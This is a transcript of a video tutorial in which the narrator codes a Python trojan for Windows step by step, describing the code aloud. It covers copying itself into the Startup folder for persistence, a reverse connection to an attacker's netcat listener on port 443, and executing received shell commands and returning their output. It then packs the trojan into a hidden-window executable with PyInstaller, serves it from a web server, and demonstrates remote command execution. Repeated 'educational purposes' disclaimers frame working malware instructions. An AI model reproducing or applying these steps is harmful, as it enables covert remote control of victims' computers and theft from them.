Hello guys, good morning, good afternoon, good evening. How are you guys doing? I hope you guys are doing fine. I hope you guys are okay. So today we are going to build, to code, to write, to program a trojan in Python. Alright, so we are going to build this for Windows targets, Windows system. Alright, and two things first. This last week I received a lot of messages on my messenger asking me to help hack someone, hack into some account, helping hack, right, or how to obfuscate a virus or payload, how to get Facebook information, phishing stuff. Let me tell you guys something. I don't do this kind of things, alright? Please don't send me a message privately asking me for that. Also, I don't give private classes, okay? I have no time for that. Probably if you ask me to hack into something or someone, I'm going to report you to Google, to Facebook, or to the platform, alright? People asking to hack Instagram, all kind of networks, social networks. I don't do that, okay? I'm ethical hacker. Other thing, this is just a educational purpose video. If you want to do some shit with your life, if you want to do something wrong, don't watch this video, alright? If you don't have your head in place, don't watch this video. If you want to do something bad to someone else, don't watch this video, right? And that's it. Okay, so let's start. Again, this is for educational purposes, alright? I'm going to open my PyCharm. So here we are going to create a new file. Okay. Trojan. You can use any IDE you want. I use PyCharm, but you can use like Idle 3, Notepad++, or any other you want. Alright, Atom or any other, Visual Studio Code, any other. First, we have to import some modules. Okay, like import socket, import subprocess, import threading, import time, and import OS. Right, perfect. Now we have to create two variables to receive the IP address and the port of our server or attacker machine. I will explain you guys how it works. Well, normally a black hat, okay, a black hat uses a CNC server, right? Command and control server. It means like he has his own server on a VPS or on the cloud or someone else's computer or on his own computer, but there's his own network, but there is a CC that keep listening for connections, and then when this connection come true, he receives an alert or a message, alright, that an IP connected into the port X. So what is an CNC? CNC is command and control. It means that you control and you command everything that's connected to it. Okay, so now we have to create a variables. On this case, I'm not going to use any CNC. We are going to use Netcat. Right, is the Swiss knife. It's amazing. Okay, Netcat, it's amazing. So we are going to open a listener on Netcat and stay listening for connections coming in. Right, so let's create it. CCIP equal, here I will let empty for now, CC port, and then 443. 443 is like port 80 HTTP but with security layer. It means probably when the target connects to our server, it is going to be scanned by the antivirus or the firewall, or for the EDR, EDX, EDM solution or endpoint protection, and then this protection is going to check if it's a legit or not, or if the connection is valid or not. Okay, so 443 is the SSL, let's say, connection. All right, and well, now we have to create a function that is going to outrun the script or the trojan to keep the persistence. Let's say we want to keep connected to the target machine even when it's restarted, right? We want to keep connected. The target just turned off the computer when the person or the target turns it on. We are going to receive the connection if we have the listener. Okay, so to do that, we are going just to create a variable outrun. Okay, now we have to define some things like the file name. Why? When we keep persistence, we have to move the trojan or the malware from the downloaded folder to a specific folder on the users. All right, on the user folder, like obelix slash appdata slash Microsoft slash Windows slash start menu start slash programs, and then slash startup, and there we put, because from there it's going to be started every single time. Right, so first file equal, now here we have to say the path base name. All right, so os dot path dot base name is underscore file, right? File name, to not give any conflict, right? And now we have to convert this file to an exe. Like on here it's not going to work on mine because I'm using Ubuntu, but on if you're using Windows, it's going to do it. It's going to happen because when we convert from Python to exe, right, and we ask to move to the root folder, let's say to the another folder, it's going to copy the py file, the Python file. We want to copy the exe, so we have to create a variable to receive this information that's going to convert to another one. All right, so exe file equals. Now here is one thing. We're going to take the file name and then we are going to put on the replace. Okay, so file and dot replace. So here we open dot py and then dot exe. It's going to work because I'm running my target machine over here. Okay, so let's continue. Now we have done this. Now we have to set, like we could print, let's say, the message, like print exe file, and then it's going to print one file copied and the name of the file, but we don't want the target to see any terminal. All right, so we are going to create, now we are going to import os.system, and then we're going to copy it. Okay, open close brackets, and then here slash appdata slash oh no, sorry, slash let me open here it's Microsoft users obliques app data roaming, and then Microsoft Windows start menu, programs, startup. Okay, this is the page. Alright, so here is it here. Okay, so let's do it here. Okay, it's much better to do it here. Yeah, perfect. So we are going to copy to end user and then app data, Microsoft Windows start menu, programs, and then startup. Now we have to set the format. So format, okay, exe file. Alright, so we are done with this function. Okay, we can leave it like that. Now we have to create a connection function, like we're going to receive a IP, an IP and a port. So we have to try it and try to connect to it. Okay, so when we connect, we're going to receive a message that we're not going to receive the message, but we are connected to the client, and the terminal will be available for typing. All right, if there's an error, we're going to receive the error message. Okay, we don't need to use the print message, okay, but we can actually, we are going to use, because this is going to be hidden anyway. So for now, def, we just call another function con, remembering you can give any name as you want. You don't have to do the same names I use for the variables or for the functions. You can give any name to the function, right? IP, and then CC port. Okay, now with this we are going to try to connect to the socket. All right, with the socket. So client equal. Now here we are going to import the socket. Okay, so socket and then open parenthesis socket dot af inet, and then socket dot socket stream. Perfect. Here we are going to call this function in Python to give us a try to connect to the client, to the target. Okay, so now when this is validated, we are going to say client dot connect, and then we are going to use the IP, CCIP and CC port. Okay, perfect. Now we can return something. Return client. With this, we already have connection into the target computer. Okay, but there's one thing. We have to give and try any one exception. If it doesn't work, we have to receive a message. All right, so try, and then let's do it. Okay, now accept exception as error, and then print error. Okay, and here we are done with this. Okay, remembering the target is not going to see these messages. All right, this is just for a study, for educational, so we are going to print in this. Okay, and if there's any error in the target machine, okay, so if there any error in the target machine, we are going to receive this. Okay, so now we have to create a function to the sub process. The sub process is like the commands we enter in on the terminal. Okay, the second. I'm sorry for that. Well, def, okay, cmd client data. We're going to work with them. Now we are already going to start a try. So here we have to start a process. Okay, so proc the name of variable. You can use any variable you want. All right, so subprocess.popen. Okay, here we are going to open the process. Then we are going to receive our data slash shell true stdin. This is going to thread our errors. Okay, so if we enter something that's not valid on the terminal, it's going to bring us a message like this command is not recognized, blah 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 blah. So to this we have to do subprocess.pipe. Okay, the another one is std error. Okay, subprocess.pipe, and the last one is subprocess std out subprocess.pipe. Okay, so we finished. Let's save it, and now we have to give a output. Okay, we have to work on it. So output, you can give any name to this variable you want. Also proc.output std out. Now we are going to receive and read this. All right, read plus here we have to receive and then we have to read it. The same thing with the error message, we have to read it. So proc.stdr dot read. Okay, and we are done here. Now we have to receive send from the client to the server a message also. So we can do a like client and then output or something like that. Okay, we can actually send it to the target and the target to the client, to the server. So client dot send. Okay, here we are going to use the output, the variable output. Okay, output plus b. Okay, let's save it. Now if there is any error, why is not it's here also, why is that? Alright, so accept exception as error and then print error. Alright, so we are done here. Yeah, I forgot n on this line. So we are done with this too. Okay, so let me see some things. I hate when this happens. Sorry guys, I just gave too much. Okay, accept, and then right here. Okay, and then here, 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 then here, here. Okay, so the indentation in Python is very important. because the other way the software is not going to work. Okay, so now I have to create the connection and to keep it alive when we still receiving the data or receiving information. Okay, so def CLI client. You can give any name you want, like a target or whatever. I just what's coming to my mind. So now I have to try while true. Okay, while true what? When we keep receiving data, okay, equal from where? From the client, right? So client dot what we have to do here, we're not going to send anything from this machine, we're going to receive command, right? So receive, right, 1024, then decode, we're going to decode it, and then we are going to do what? To strip it, perfect. Now we have to make a, we have to have a command to stop, like we want to leave for now, for a while we want to stop working on that machine, but we want to keep access to that machine. So what we are going to do, we are going to use a comparison with if, like we are going to compare if data we received, like the command we received, it's equal something, and then if it's like that, we are going to close it. Okay, so to do that, it's very simple. Okay, we just say if data equal, you can use any command you want, but I'm going to use this one. Kill. You can like exit whatever you want, so I like to use it to be more safe, because I have this kind of stuff that I always do something wrong. So exit. Better. We are going to return to keep it alive. Else, then we have the else that we're going to say threading dot thread. Oops. Thread. So in this thread we are going to use a target. So target equal cmd. Okay, and on cmd we are going to use another args, like args equal. What are these args? They are the client and the data itself, because we are going to receive from this. Okay, and then we start. So every time we type, we restart the connection, and then we keep it alive and giving commands. All right. So now we have another thread, except exception as error, print error. If there's anything that goes wrong, we could print, or better, client, it's going to close the connection. It's much better than we receive a message. All right, it's much better than we just enter a message to ourselves. So here we are done. Now we are going to create a main stuff that we are going to import the functions and then to keep it alive. So if name equal main, what we're going to outrun. Okay, now we have to create another while to keep it alive again, to still, because this is the main function. Okay, so we have to keep everything alive here. So while true, what we're going to do, client equal con, and then we're going to receive from where? CCIP CC port CC port. Okay, now we have to use a if again. If client equals cli, and then client what? Client. Okay. Or we can put it to sleep and wake each 3 seconds to check a connection. Else, okay, time dot sleep, and then 3. You can find 5, 10, 2, 1, 50 or 60 seconds any time you want. Okay, so I'm going to save it. Let me see something. Let me run it for now. Let me see. Yes, copy. Alright, it's not found, so sorry. Let me stop it. Okay, let me see. Else accept. Ah, yeah, the IP. Sorry, I forgot the IP. Here is the IP address of my server. So don't even try to do anything because I already changed the IP address at this point. All right. Ctrl S, perfect. Let me open it. Let me see, perfect. Now, as I told you guys, we are going to use netcat. If I didn't say, I'm saying right now, we are going to use netcat. Then we are going to listen on the port 443. I press enter and we start listening. Okay, perfect. Let me see something. Let me run it. Okay, so probably we are going to receive sooner. Oh, here we are. We just received a connection. Just for you guys to be sure that there I am on, let me see, ls. Here I is the directory folders, cd ls. Yeah, now who am I? Okay, I'm Obelix. Okay, so we pretty much got a connection. Okay, what I'm going to do is I will try to turn it on an executable. Let me close it here. No, cancel. Just stop here, and then I'm going to start to listen again, and then I'm going to stop here because now we are going to use the terminal. Let me see something. Pip by installer. Pip install. Sorry. Install by installer, and then it's going to connect. Okay. Clear. Now by installer F clean. After we finish, it's going to clean everything, and then W to hide the window, and then the name we want to convert, trojan.py. Let's see if it's going to work. It's checking, and probably it's going to create a folder right here. Okay, so let me see something. Yeah, already created, and it's here. Let me show you guys here. Okay, probably it's not a ls. Let me see something. exe cd dist ls cd trojan. yeah, actually it's here, but it's not an executable. So documents, PyTools, documents, PyTools, dist, and trojan. Let me check the properties. This is an executable. So what I'm going to do, I'm going to open the terminal here, sudo cp its name trojan.exe to var www html, the password. Well, alright. Okay, so it's here. Now I'm going to open my target machine and I will check it again. 192, it's 134 if I'm not wrong, and then trojan. Let me see if it's going to open. Yeah, actually it's going to open as a normal file. So it's this kind of problem we have on with conversion to Windows. Alright, so let me see here. Yeah, I cannot convert it. So let me open the folder. I'm going to open the folder and then I'm going to change the extension of this file properties. Let me see something. Rename, view, file extensions. Okay. .exe. Okay, let's try something. Okay, obviously this is a Trojan, so Windows will get it. Right, so let me see. This app cannot run on your PC, but anyway, let me see something here. Let me close this window and then let me close here. It's keep listening. So we have to embed that, alright, we have to obfuscate it to run it on Windows, alright, so cannot, alright, understand that. But in any way, the connection is working as we could see on Ubuntu machine, right? Here we could check. I could install on that machine VM. Let me see if I have Python here, because if I have Python here I could execute. Yeah, no, I don't have Python on that machine, on this machine, so it's not going to work. But this is not going to run, so I'm going to delete that. Alright, and we are going to check on Ubuntu again. I'm going to open here, remembering that here is the public IP address. Alright, so let's run. Okay, and here copy not found, it means like the file was not found on the directory to move it. Okay, because remembering again the extension here is exe, that doesn't exist in Linux. So I just got a connection again, and like we can see that it's working. I could say mkdir obelix, let me see, and then let me see here it's created obelix, okay, with the command. So rm dir obelix, press enter, and then it's going to be removed here. Okay, so it's working, works perfectly. All right, so now you can create your own Trojan, and you can do, you know, you can think, you can personalize it, you can do a lot of commands, you can put a keylogger inside of it and many other stuff. All right, so again, this is for educational purposes only. Please don't do anything stupid. Okay, so, and thanks again for watching my videos, and see you guys on the next video.